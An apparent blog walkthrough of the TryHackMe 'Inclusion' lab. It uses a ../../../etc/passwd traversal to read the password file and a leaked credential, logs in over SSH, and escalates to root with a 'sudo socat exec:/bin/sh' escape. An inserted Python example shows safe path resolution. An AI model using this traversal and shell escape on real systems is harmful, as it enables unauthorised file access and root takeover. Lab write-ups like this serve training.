LFI Inclusion TryHackMe Walkthrough

arnold sydney
Jan 6, 2021

Move up the directories until you can access the /etc/passwd file: http://ip/article?name=../../../etc/passwd

/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash
#falconfeast:rootpassword
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false

Using the username:password pair on the commented-out “#” line in the file, log in over SSH, since the service was running (from the nmap scan).
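On the defensive side, the request `article?name=../../../etc/passwd` succeeds because the parameter reaches the filesystem unchecked. The following Python is an added example, not code from the room or from the original post; the `articles` directory, the function names and the sample files are assumptions made for illustration. It contrasts a plain join with a resolver that canonicalises the path and refuses anything outside the article directory.

```python
import tempfile
from pathlib import Path
from urllib.parse import unquote


def resolve_naive(base: Path, name: str) -> Path:
    """Join the parameter as-is: the behaviour the traversal depends on."""
    return base / name


def resolve_safe(base: Path, name: str) -> Path:
    """Return the file for `name` only if it really lives under `base`."""
    base = base.resolve()
    decoded = unquote(name)  # catch a leftover %2e%2e%2f layer
    if "\x00" in decoded:
        raise ValueError("NUL byte in article name")
    candidate = (base / decoded).resolve()  # collapses ../ and follows symlinks
    # Compare path components, not string prefixes (articles_old != articles).
    if base not in candidate.parents:
        raise ValueError(f"article name escapes {base}: {name!r}")
    if not candidate.is_file():
        raise FileNotFoundError(decoded)
    return candidate


def demo() -> dict:
    """Run both resolvers over constructed inputs in a throwaway directory."""
    results = {}
    names = ["hacking", "no-such-article", "../../../etc/passwd",
             "..%2fsecret", "/etc/passwd"]
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "articles"  # assumed article directory
        base.mkdir()
        (base / "hacking").write_text("sample article")  # constructed
        (Path(tmp) / "secret").write_text("outside the article dir")  # constructed
        naive = resolve_naive(base, "../secret").resolve()
        results["naive_escapes"] = base.resolve() not in naive.parents
        for name in names:
            try:
                resolve_safe(base, name)
                results[name] = "served"
            except (ValueError, FileNotFoundError) as exc:
                results[name] = type(exc).__name__
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r}: {value}")
```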

User {Flag}

See what we can run with “sudo”.

socat

Just google “(root) NOPASSWD: /usr/bin/socat”; GTFOBins is an excellent resource for exploiting Unix binaries.

sudo :)

falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root

Ain’t a proper shell… trying to spawn one…

python -c 'import pty; pty.spawn("/bin/bash")'
bash: line 2: python: command not found

*No Python interpreter is installed.

We can just navigate the directories as root and look for our flag.
whoami
root
cat /root/root.txt
{flag}

Cheers!